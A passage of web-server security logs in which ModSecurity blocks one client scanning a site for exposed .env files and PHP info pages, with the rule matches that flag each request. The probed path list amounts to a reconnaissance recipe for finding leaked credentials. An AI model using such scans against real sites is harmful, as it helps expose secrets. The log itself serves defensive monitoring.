"la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHo1Py_GXSWIKeli0v1ggAAAIg"]
[Mon May 11 16:33:56.295253 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHo1Py_GXSWIKeli0v1ggAAAIg"]
[Mon May 11 16:33:56.295516 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHo1Py_GXSWIKeli0v1ggAAAIg"]
[Mon May 11 16:33:56.453529 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gwAAAIg"]
[Mon May 11 16:33:56.453908 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gwAAAIg"]
[Mon May 11 16:33:56.454087 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gwAAAIg"]
[Mon May 11 16:33:56.454338 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHo1Py_GXSWIKeli0v1gwAAAIg"]
[Mon May 11 16:33:56.612114 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hAAAAIg"]
[Mon May 11 16:33:56.612561 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hAAAAIg"]
[Mon May 11 16:33:56.612756 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hAAAAIg"]
[Mon May 11 16:33:56.612996 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hAAAAIg"]
[Mon May 11 16:33:56.771693 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hgAAAIg"]
[Mon May 11 16:33:56.772047 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hgAAAIg"]
[Mon May 11 16:33:56.772241 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hgAAAIg"]
[Mon May 11 16:33:56.772480 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hgAAAIg"]
[Mon May 11 16:33:56.930289 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hwAAAIg"]
[Mon May 11 16:33:56.930730 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hwAAAIg"]
[Mon May 11 16:33:56.930917 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hwAAAIg"]
[Mon May 11 16:33:56.931176 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHo1Py_GXSWIKeli0v1hwAAAIg"]
[Mon May 11 16:33:57.088835 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php"] [unique_id "agHo1fy_GXSWIKeli0v1iAAAAIg"]
[Mon May 11 16:33:57.089036 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php"] [unique_id "agHo1fy_GXSWIKeli0v1iAAAAIg"]
[Mon May 11 16:33:57.089306 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php"] [unique_id "agHo1fy_GXSWIKeli0v1iAAAAIg"]
[Mon May 11 16:33:57.249746 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/info.php"] [unique_id "agHo1fy_GXSWIKeli0v1iQAAAIg"]
[Mon May 11 16:33:57.249963 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/info.php"] [unique_id "agHo1fy_GXSWIKeli0v1iQAAAIg"]
[Mon May 11 16:33:57.250210 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/info.php"] [unique_id "agHo1fy_GXSWIKeli0v1iQAAAIg"]
[Mon May 11 16:33:57.407932 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/php.php"] [unique_id "agHo1fy_GXSWIKeli0v1igAAAIg"]
[Mon May 11 16:33:57.408131 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/php.php"] [unique_id "agHo1fy_GXSWIKeli0v1igAAAIg"]
[Mon May 11 16:33:57.408394 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/php.php"] [unique_id "agHo1fy_GXSWIKeli0v1igAAAIg"]
[Mon May 11 16:33:57.566143 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/i.php"] [unique_id "agHo1fy_GXSWIKeli0v1iwAAAIg"]
[Mon May 11 16:33:57.566360 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/i.php"] [unique_id "agHo1fy_GXSWIKeli0v1iwAAAIg"]
[Mon May 11 16:33:57.566592 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/i.php"] [unique_id "agHo1fy_GXSWIKeli0v1iwAAAIg"]
[Mon May 11 16:33:57.724347 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/pi.php"] [unique_id "agHo1fy_GXSWIKeli0v1jQAAAIg"]
[Mon May 11 16:33:57.724551 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/pi.php"] [unique_id "agHo1fy_GXSWIKeli0v1jQAAAIg"]
[Mon May 11 16:33:57.724772 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/pi.php"] [unique_id "agHo1fy_GXSWIKeli0v1jQAAAIg"]
[Mon May 11 16:33:57.887941 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/pinfo.php"] [unique_id "agHo1fy_GXSWIKeli0v1jgAAAIg"]
[Mon May 11 16:33:57.888142 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/pinfo.php"] [unique_id "agHo1fy_GXSWIKeli0v1jgAAAIg"]
[Mon May 11 16:33:57.888377 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/pinfo.php"] [unique_id "agHo1fy_GXSWIKeli0v1jgAAAIg"]
[Mon May 11 16:33:58.046243 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/test.php"] [unique_id 